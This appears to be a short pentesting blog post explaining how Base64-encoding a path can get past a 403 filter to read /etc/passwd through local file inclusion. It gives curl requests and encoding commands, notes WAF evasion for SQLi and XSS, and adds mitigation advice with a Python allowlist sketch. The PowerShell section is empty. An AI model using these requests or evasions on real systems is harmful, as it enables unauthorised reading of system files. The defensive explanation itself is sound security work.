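In penetration testing, encountering a 403 Forbidden error when accessing sensitive files like `/etc/passwd` is common. However, encoding the file path in Base64 can sometimes bypass this restriction. This works when the filter inspects only the raw parameter value while the application decodes the value before using it.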
Example Exploitation
1. Original Request Blocked:
curl http://example.com/?f=/etc/passwd
Returns 403 Forbidden.
2. Base64-Encoded Bypass:
- Encode `/etc/passwd` in Base64:
echo -n "/etc/passwd" | base64
Output: `L2V0Yy9wYXNzd2Q=`
- Use the encoded payload:
curl http://example.com/?f=L2V0Yy9wYXNzd2Q=
Returns 200 OK, leaking `/etc/passwd`.
You Should Know:
- Applicable Attack Vectors:
- LFI (Local File Inclusion) – Bypass filters.
- SQL Injection – Evade WAFs with encoded payloads.
- XSS/SSTI – Obfuscate malicious input.
- Automating Base64 Encoding in Linux:
- Encode:
echo -n "payload" | base64 -w0
- Decode (for verification):
echo "L2V0Yy9wYXNzd2Q=" | base64 -d
- Windows Equivalent (PowerShell):
Encode: Decode:
Mitigation:
- Server-Side:
- Reject Base64-encoded input in filters.
- Implement strict allowlists for file access.
- Use mod_security (Apache) or WAFs to detect encoding evasion.
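The allowlist mitigation above, sketched as an added example (not code from the original post): the parameter is decoded once, the way the application would use it, and only the decoded, canonical path is validated. `BASE_DIR`, `ALLOWED_FILES` and all function names are assumptions made for illustration, as is the decode-if-valid-Base64 behaviour of the application.

```python
import base64
import os
from typing import Optional

# Assumed for this example: the directory the endpoint serves from and the
# only file names it may return.
BASE_DIR = os.path.realpath("/var/www/app/pages")
ALLOWED_FILES = {"home.html", "about.html"}


def raw_blocklist_ok(raw: str) -> bool:
    """Weak filter from the scenario: looks only at the raw parameter."""
    return "/etc/" not in raw and ".." not in raw


def decode_param(raw: str) -> str:
    """Decode the parameter once, the way the application would before use."""
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return raw  # not valid Base64 text: the value is used as-is


def resolve_allowed(raw: str) -> Optional[str]:
    """Validate the decoded, canonical path. Returns the path or None."""
    name = decode_param(raw)
    if "\x00" in name:
        return None
    full = os.path.realpath(os.path.join(BASE_DIR, name))
    if os.path.commonpath([full, BASE_DIR]) != BASE_DIR:
        return None  # resolves outside the served directory
    if os.path.relpath(full, BASE_DIR) not in ALLOWED_FILES:
        return None  # inside the directory but not on the allowlist
    return full


def encoded_path_in_log(raw: str) -> bool:
    """Log check: parameter is Base64 whose decoded text looks like a path."""
    decoded = decode_param(raw)
    return decoded != raw and ("/" in decoded or ".." in decoded)
```

`raw_blocklist_ok` passes the encoded value from the example request, while `resolve_allowed` rejects it because the check runs on the same decoded value the file access would use.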
What Undercode Say:
This technique exploits weak input validation. Always sanitize and normalize user input. For defenders, monitor logs for unusual encoding patterns.
Expected Output:
L2V0Yy9wYXNzd2Q=
Reported By: Zlatanh How – Hackers Feeds



